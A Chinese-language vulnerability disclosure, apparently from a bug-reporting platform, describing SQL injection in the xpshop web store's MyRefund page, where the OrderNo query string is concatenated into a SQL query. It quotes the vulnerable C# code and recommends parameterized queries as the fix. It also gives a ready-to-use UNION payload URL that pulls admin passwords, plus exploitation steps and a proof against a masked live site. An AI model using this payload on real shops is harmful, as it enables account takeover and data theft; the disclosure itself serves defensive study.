### 简要描述:

xpshop 的 MyRefund 页面中，`OrderDB.GetOrderID` 将来自查询字符串的 `OrderNo` 直接拼接进 SQL 语句，未做参数化处理，任一已注册登录的用户均可触发 SQL 注入。

### 详细说明:

漏洞位置: xpshop.webui.MyRefund

```csharp
protected void Page_Load(object sender, EventArgs e)
{
    if (base.CurrentUser == null)
    {
        string str = "Login.aspx?ReturnUrl=/" + WebUIBase.ShopFolder + "MyRefund.aspx";
        base.Response.Redirect("/" + WebUIBase.ShopFolder + str);
    }
    else
    {
        if (base.CurrentUser.Name == "anonymous")
        {
            string str = "index." + this.config.html;
            base.Response.Write(base.GetResourceString("MsgPleaseSignInFirst"));
            base.Response.Write(Utils.Redirect("/" + WebUIBase.ShopFolder + str));
        }
        if (!base.IsPostBack)
        {
            if (base.Request.QueryString["type"] != null && base.Request.QueryString["Action"] != null)
            {
                string text = base.Request.QueryString["Action"];
                if (text != null && text == "GetProducts")
                {
                    this.GetProducts();
                }
                base.Response.End();
            }
```

（以上片段有截断，后续闭合括号未列出。）

跟进函数 GetProducts（片段同样不完整）:

```csharp
private void GetProducts()
{
    string orderNo = base.Request.QueryString["OrderNo"];
    OrderDB orderDB = new OrderDB();
    int orderID = orderDB.GetOrderID(orderNo, base.CurrentUser.MemberID);
    string text;
    if (orderID == 0)
    {
        text = "{'OrderExist':'false','Products':[]}";
    }
```

跟进函数 GetOrderID:

```csharp
public int GetOrderID(string orderNo, int memberID)
{
    object obj = XpShopDB.ExecuteScalar(XpShopDB.ConnectionString, CommandType.Text, string.Concat(new object[]
    {
        "SELECT OrderID FROM Orders WHERE OrderNo = '",
        orderNo,
        "' AND MemberID = ",
        memberID
    }), null);
    return (obj != null) ? ((int)obj) : 0;
}
```

可以看到 `orderNo` 由 `Request.QueryString["OrderNo"]` 直接取得，未经任何过滤即以字符串拼接方式进入 SQL 语句，`memberID` 的存在只能限制查询范围而不能阻止注入；正确的修复是改用参数化查询（将 `orderNo` 作为 `SqlParameter` 传入），而不是对输入做字符替换。

payload:

`/myrefund.aspx?type=1&action=GetProducts&OrderNo=1' union select password from admin--`

利用方法: 注册一个普通账户并登录，然后访问上面这个 URL。

### 漏洞证明:

http://**.**.**.**/myrefund.aspx?type=1&action=GetProducts&OrderNo=1' union select password from admin--

[<img src="https://images.seebug.org/upload/201510/15161245ed94d066c9b7c6a481eadac1bc5c48c1.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/15161245ed94d066c9b7c6a481eadac1bc5c48c1.jpg)